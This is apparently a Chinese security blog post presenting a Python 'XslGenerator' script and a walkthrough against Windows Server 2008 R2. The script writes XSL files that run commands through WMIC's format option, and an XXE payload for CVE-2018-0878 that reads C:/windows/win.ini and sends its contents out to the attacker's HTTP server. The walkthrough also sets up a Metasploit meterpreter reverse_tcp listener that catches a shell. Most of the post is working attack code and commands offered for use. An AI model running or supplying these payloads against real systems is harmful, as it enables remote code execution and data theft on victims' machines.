• python打造XslGenerator

    0x00前言

    今天加载了Demon哥分享的RSS。其中有一篇是三好学生讲的:

     在仔细越读这篇文章后,我懂得了里面的一些骚操作,所以有了以下的

    脚本。

    0x001代码

    import optparse
import time
import os
import socket

def main():
    parser=optparse.OptionParser()
    parser.add_option('-b',dest='local',action='store_true',help='Generator Local Xsl')
    parser.add_option('-y',dest='Long',action='store_true',help='Generator Long-range Xsl')
    parser.add_option('-j',dest='CVE',action='store_true',help='Conduct CVE-2018-0878')
    (options,args)=parser.parse_args()
    if options.local:
        Local()
    elif options.Long:
        Long()
    elif options.CVE:
        Cve()
    else:
        parser.print_help()
        exit()

def Local():
    with open('poc.xsl','w') as l:
        l.write('''<?xml version="1.0"?>
<!-- Copyright (c) Microsoft Corporation.  All rights reserved. -->
<xsl:stylesheet version="1.0"
      xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
      xmlns:msxsl="urn:schemas-microsoft-com:xslt"
      xmlns:user="urn:my-scripts">
<xsl:output encoding="utf-16" omit-xml-declaration="yes"/>
<xsl:param name="norefcomma"/>

<msxsl:script language="JScript" implements-prefix="user">
   function myFunction() {
    var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
          return "";      
   }
</msxsl:script>

<xsl:template match="/">

<xsl:value-of select="user:myFunction()"/>

Node,<xsl:for-each select="COMMAND/RESULTS[1]/CIM/INSTANCE[1]//PROPERTY|COMMAND/RESULTS[1]/CIM/INSTANCE[1]//PROPERTY.ARRAY|COMMAND/RESULTS[1]/CIM/INSTANCE[1]//PROPERTY.REFERENCE"><xsl:value-of select="@NAME"/><xsl:if test="position()!=last()">,</xsl:if></xsl:for-each><xsl:apply-templates select="COMMAND/RESULTS"/></xsl:template> 


<xsl:template match="RESULTS" xml:space="preserve"><xsl:apply-templates select="CIM/INSTANCE"/></xsl:template> 
<xsl:template match="VALUE.ARRAY" xml:space="preserve">{<xsl:for-each select="VALUE"><xsl:apply-templates select="."/><xsl:if test="position()!=last()">;</xsl:if></xsl:for-each>}</xsl:template>
<xsl:template match="VALUE" xml:space="preserve"><xsl:value-of select="."/></xsl:template>
<xsl:template match="INSTANCE" xml:space="preserve">
<xsl:value-of select="../../@NODE"/>,<xsl:for-each select="PROPERTY|PROPERTY.ARRAY|PROPERTY.REFERENCE"><xsl:apply-templates select="."/><xsl:if test="position()!=last()">,</xsl:if></xsl:for-each></xsl:template> 

<xsl:template match="PROPERTY.REFERENCE" xml:space="preserve"><xsl:apply-templates select="VALUE.REFERENCE"></xsl:apply-templates></xsl:template>

<xsl:template match="PROPERTY"><xsl:apply-templates select="VALUE"/></xsl:template>
<xsl:template match="PROPERTY.ARRAY"><xsl:for-each select="VALUE.ARRAY"><xsl:apply-templates select="."/></xsl:for-each></xsl:template>

<xsl:template match="VALUE.REFERENCE">"<xsl:apply-templates select="INSTANCEPATH/NAMESPACEPATH"/><xsl:apply-templates select="INSTANCEPATH/INSTANCENAME|INSTANCENAME"/>"</xsl:template>

<xsl:template match="NAMESPACEPATH">\<xsl:value-of select="HOST/text()"/><xsl:for-each select="LOCALNAMESPACEPATH/NAMESPACE"><xsl:value-of select="@NAME"/></xsl:for-each>:</xsl:template>

<xsl:template match="INSTANCENAME"><xsl:value-of select="@CLASSNAME"/><xsl:for-each select="KEYBINDING"><xsl:if test="position()=1">.</xsl:if><xsl:value-of select="@NAME"/>="<xsl:value-of select="KEYVALUE/text()"/>"<xsl:if test="position()!=last()"></xsl:if><xsl:if test="not($norefcomma=&quot;true&quot;)">,</xsl:if><xsl:if test="$norefcomma=&quot;true&quot;"><xsl:text> </xsl:text></xsl:if></xsl:for-each></xsl:template>


</xsl:stylesheet>
        ''')
        l.close()
        print('[*]{}'.format('Generation completion'))
        print('[*]{}'.format('you want to bounce meterpreter.Please create the back door and put the generated back door inito the clear computer,and use modify.py to modify the place where exe is executed'))
        print('[*]{}'.format('Enter the directory where you store poc.xsl and exeute the command in the target computer: wmic os get format:poc'))

def Long():
    with open('Longpoc.xsl','w') as g:
        g.write('''<?xml version='1.0'?>
<stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder"
version="1.0">
<output method="text"/>
    <ms:script implements-prefix="user" language="JScript">
    <![CDATA[
    var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
    ]]> </ms:script>
</stylesheet>
        ''')
        g.close()
        print('[*]{}'.format('Generation completion'))
        os.system('mv Longpoc.xsl /var/www/html')
        print('[*]{}'.format('This XSL is moved to the /var/www/html directory'))
        print('[*]{}'.format('Modify the program executed in XLS with modify.py'))
        print('[*]{}'.format('Put the generated back door into the target computer'))
        print('[*]{}'.format('Start the Apache service'))
        print('[*]{}'.format('wmic os get format:"http://IP/Longpoc.xsl"'))

def Cve():
    print('[@]Vulnerability introduction:https://www.exploit-db.com/exploits/44352/')
    s=socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
    connect=s.connect(('8.8.8.8',80))
    ip=s.getsockname()[0]
    ml="python -m SimpleHTTPServer 8080"
    with open('xxe.xml','w') as c:
        c.write('''<!ENTITY % payload SYSTEM "file:///C:/windows/win.ini">  
<!ENTITY % root "<!ENTITY &#37; oob SYSTEM 'http://{}/?%payload;'> ">  
        '''.format(ip))
        c.close()
        os.system('mv payload.xls /var/www/html')

    with open('payload.xsl','w') as p:
        p.write('''<?xml version="1.0" encoding="UTF-8" ?>  
<!DOCTYPE zsl [  
<!ENTITY % remote SYSTEM "http://{}:8080/xxe.xml">  
%remote;%root;%oob;]>
        '''.format(ip))
        p.close()
        print('[*]{}'.format('Get the native IP:',ip))
        print('[*]{}'.format('Create a httt server'))
        print('[*]{}'.format('Have been created xxe.xml'))
        print('[*]{}'.format('Already moved /var/www/html'))
        print('[*]{}'.format('Have benn payload.xls,Move him to the computer,And execute the command:wmic os get format:payload.xsl'))
        os.system(ml)
if __name__ == '__main__':
    main()

    测试结果: -b

    攻击机:Ubuntu

    受害者:windows server 2008 r2

    生成后并修改后的的xsl

    msfvenom生成的shell.exe

     Windows Server 2008 r2

     进入shell.exe所在的目录中在cmd中执行:wmic os get /format:sd

    Ubuntu中执行监听:

    use exploit/multi/headers
set LHOST 192.168.223.133
set LPORT 4444
set PAYLOAD windows/x64/meterpreter/reverse_tcp
run

    测试结果:-j   CVE-2018-0878

    漏洞结果详情:https://www.exploit-db.com/exploits/44352/

    生成了xxe.xml与payload.xls

    xxe.xml移动到了/var/www/html  

    payload.xls放入到受害者windows server 2008 r2

    xxe.xml:

    <!ENTITY % payload SYSTEM "file:///C:/windows/win.ini">  
<!ENTITY % root "<!ENTITY &#37; oob SYSTEM 'http://192.168.223.133:8080/?%payload;'> ">

    payload.xsl:

    <?xml version="1.0" encoding="UTF-8" ?>  
<!DOCTYPE zsl [  
<!ENTITY % remote SYSTEM "http://192.168.223.133:8080/xxe.xml">  
%remote;%root;%oob;]>

     启动apache服务

    service apache2 start

    在windows server 2008 r2中执行:

    wmic os get /format:payload.xsl

    执行失败但漏洞触发成功了。

    这里的-b选项我就不演示了,具体步骤跟上面两个差不多

    1.生成的poc.xsl修改在目标机上执行的程序并移动到apache2

    2.开启apache2

    3.将生成的后门扔到目标机

    4.执行wmic os get /format:"http://192.168.223.133/poc.xsl"

    这时候wmic就会请求xsl并执行。你如果此刻在监听你就收到了一个shell
  • 相关阅读:
    GeneXus笔记本—城市级联下拉
    GeneXus笔记本—获取当月的最后一天
    GeneXus笔记本——创建一个知识库 哈哈哈哈!
    GeneXus笔记本——入门篇
    Android Studio 学习笔记1.1 创建自己的第一个安卓项目并且打包APK
    初入Android Studio的我
    随笔
    在Azuer创建自己的Linux_VM
    获得自己电脑的SSH公匙
    数据库内连接、外连接以及左右连接的区别
  • 原文地址:https://www.cnblogs.com/haq5201314/p/9146045.html
Copyright © 2020-2023  润新知